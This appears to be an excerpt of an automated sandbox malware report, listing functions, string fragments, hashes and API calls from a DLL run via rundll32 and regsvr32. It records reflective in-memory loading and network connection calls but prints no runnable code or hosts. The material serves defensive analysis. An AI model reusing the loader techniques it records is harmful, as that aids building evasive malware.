t:v, xrefs: 0000000180005E76
-!zt, xrefs: 0000000180005BD7
d}9J, xrefs: 0000000180006179
ru, xrefs: 000000018000623C
Mv`b, xrefs: 0000000180005D4E
R3T, xrefs: 0000000180005C59

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
API String ID: 0-2100131636
Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

lbzZ, xrefs: 0000000180013863
lmq, xrefs: 0000000180013A6B
tro, xrefs: 00000001800139A0
$, xrefs: 0000000180013C6D
kO, xrefs: 000000018001387E
"`2, xrefs: 00000001800139CE

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$"`2$lbzZ$lmq$tro$kO
API String ID: 0-2401169580
Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UbA, xrefs: 00000001800103C4
PT, xrefs: 000000018001038A
2f, xrefs: 000000018001051C
EX., xrefs: 000000018001032D
)#?, xrefs: 0000000180010418

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )#?$EX.$PT$UbA$2f
API String ID: 0-1318892062
Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

QP|m, xrefs: 000000018001FCBC
$T, xrefs: 000000018001FF09
tZp, xrefs: 000000018001FFAF
?F, xrefs: 0000000180020023
qjf, xrefs: 000000018001FD57

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $T$?F$QP|m$qjf$tZp
API String ID: 0-3477398917
Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

v, xrefs: 00000001800170BE
JQ, xrefs: 0000000180016D72
t, xrefs: 0000000180017275
x\J, xrefs: 00000001800171C3
k&(, xrefs: 0000000180017125

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: JQ$k&($t$v$x\J
API String ID: 0-1134872184
Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

V, xrefs: 0000000180007053
?rIc, xrefs: 000000018000710E
R, xrefs: 00000001800070D3
)H8, xrefs: 000000018000709E
L==, xrefs: 0000000180007159

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: R$)H8$?rIc$L==$V
API String ID: 0-2512384441
Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON

Download Yara Rule

Strings

vird, xrefs: 00000001800119C2
+, xrefs: 00000001800119DA
bt, xrefs: 0000000180011A1E
S, xrefs: 0000000180011A92
Qq, xrefs: 0000000180011A84

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qq$bt$vird$+$S
API String ID: 0-3373980505
Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

@, xrefs: 0000000180011F6B
P9, xrefs: 0000000180011DC0
V, xrefs: 0000000180011B81
^_", xrefs: 0000000180011D6E

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V$@$P9$^_"
API String ID: 0-1880944046
Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

=_, xrefs: 00000001800136EB
syG, xrefs: 000000018001339D
F)k, xrefs: 000000018001336C
b/, xrefs: 000000018001347F

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =_$F)k$b/$syG
API String ID: 0-3955183656
Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

Strings

vG, xrefs: 000000018000316F
'Xsa, xrefs: 0000000180002EA2
#X, xrefs: 0000000180002E74
iJ6, xrefs: 0000000180003091

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$'Xsa$iJ6$vG
API String ID: 0-746338152
Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

MIC, xrefs: 0000000180009BF0
-Z, xrefs: 0000000180009D06
]2, xrefs: 0000000180009CC2
*i^, xrefs: 0000000180009A7A

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *i^$MIC$-Z$]2
API String ID: 0-498664264
Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

EG, xrefs: 000000018001082C
_, xrefs: 0000000180010A56
QsF, xrefs: 0000000180010894
B, xrefs: 0000000180010AEC

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$EG$QsF$_
API String ID: 0-784369960
Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

Strings

., xrefs: 00000001800206DC
5B.Y, xrefs: 000000018002045A
-`G, xrefs: 00000001800206A2
Z`35, xrefs: 00000001800205D3

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -`G$.$5B.Y$Z`35
API String ID: 0-1363032466
Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

WSh, xrefs: 000000018000EEF0
#o, xrefs: 000000018000EFD8
*+_, xrefs: 000000018000EF25
\O, xrefs: 000000018000F046

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *+_$WSh$\O$#o
API String ID: 0-1846314129
Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

O, xrefs: 0000000180024F9B
\<, xrefs: 0000000180024E9B
M*K, xrefs: 0000000180024E36
.B, xrefs: 0000000180025032

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .B$O$M*K$\<
API String ID: 0-3225238681
Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

$, xrefs: 000000018002A454
xVO, xrefs: 000000018002A587
$, xrefs: 000000018002A477
~O, xrefs: 000000018002A626

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$xVO$~O
API String ID: 0-3655128719
Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

,IW, xrefs: 0000000180002565
l, xrefs: 0000000180002548
JMg, xrefs: 000000018000252F
G, xrefs: 0000000180002557

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,IW$G$JMg$l
API String ID: 0-1370644289
Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

i`}G, xrefs: 0000000180018BFA
2S=, xrefs: 0000000180018BF3
,, xrefs: 0000000180018C14
,, xrefs: 0000000180018B66

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$,$2S=$i`}G
API String ID: 0-4285990414
Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 4888, Parent PID: 7140COMMON

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5%
Total number of Nodes:	80
Total number of Limit Nodes:	9

Executed Functions

Function 00E60000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00E60450
GetNativeSystemInfo.KERNELBASE ref: 00E60539
VirtualAlloc.KERNELBASE ref: 00E60580
VirtualProtect.KERNELBASE ref: 00E609E9
RtlAddFunctionTable.KERNEL32 ref: 00E60A79

Strings

Load, xrefs: 00E600C8
Size, xrefs: 00E60311
Virt, xrefs: 00E600F8
Find, xrefs: 00E602D0
Load, xrefs: 00E602F4
Slee, xrefs: 00E600B7
ualA, xrefs: 00E600E8
Reso, xrefs: 00E60355
urce, xrefs: 00E60340
ncti, xrefs: 00E6016A
ativ, xrefs: 00E6013D
ualP, xrefs: 00E600FF
ofRe, xrefs: 00E60318
Reso, xrefs: 00E602FC
truc, xrefs: 00E60121
lloc, xrefs: 00E600F0
Virt, xrefs: 00E600E0
onTa, xrefs: 00E60171
urce, xrefs: 00E60304
Reso, xrefs: 00E60338
Flus, xrefs: 00E60113
rote, xrefs: 00E60106
Cach, xrefs: 00E6012F
Reso, xrefs: 00E602DB
aryA, xrefs: 00E600D8
urce, xrefs: 00E602E7
tion, xrefs: 00E60128
GetN, xrefs: 00E60136
eSys, xrefs: 00E60144
ddFu, xrefs: 00E60163
Lock, xrefs: 00E60330
Libr, xrefs: 00E600D0
temI, xrefs: 00E6014B
urce, xrefs: 00E6035D
Free, xrefs: 00E6034D
hIns, xrefs: 00E6011A
sour, xrefs: 00E6031F
RtlA, xrefs: 00E6015C

Memory Dump Source

Source File: 00000006.00000002.875154720.0000000000E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e60000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
API String ID: 394283112-2517549848
Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction ID: ad915f7416366a0cbd7d693a4f0054d8cba45c58389ab9ea38b59f73066146bf
Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction Fuzzy Hash: BB72E630658B488FCB29DF18D8856BAB7E1FB98345F10562DE8CBD7211DB34E942CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D26C Relevance: 7.9, Strings: 6, Instructions: 361
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^c, xrefs: 000000018000D7F1
^c, xrefs: 000000018000D2F5
#X, xrefs: 000000018000D803
J, xrefs: 000000018000D653
n, xrefs: 000000018000D64B
Ec;, xrefs: 000000018000D485

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$Ec;$J$^c$^c$n
API String ID: 0-2929744921
Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F)k, xrefs: 000000018001336C
syG, xrefs: 000000018001339D
=_, xrefs: 00000001800136EB
b/, xrefs: 000000018001347F

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =_$F)k$b/$syG
API String ID: 0-3955183656
Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800046A8 Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

5IF, xrefs: 0000000180004890
P)#, xrefs: 0000000180004995

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5IF$P)#
API String ID: 0-1025399686
Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001CEC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectW.WININET ref: 000000018001D008

Strings

C, xrefs: 000000018001CFA7
:G?, xrefs: 000000018001CF7D

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: :G?$C
API String ID: 3050416762-1225920220
Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FB00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 000000018000FC2F

Strings

gF\, xrefs: 000000018000FBA2

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: gF\
API String ID: 823142352-1982329323
Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A4FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestW.WININET ref: 000000018000A612

Strings

:G?, xrefs: 000000018000A59A

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: :G?
API String ID: 1984915467-1508054202
Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012B50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 0000000180012C0A

Strings

:G?, xrefs: 0000000180012BAF

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: :G?
API String ID: 2038078732-1508054202
Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
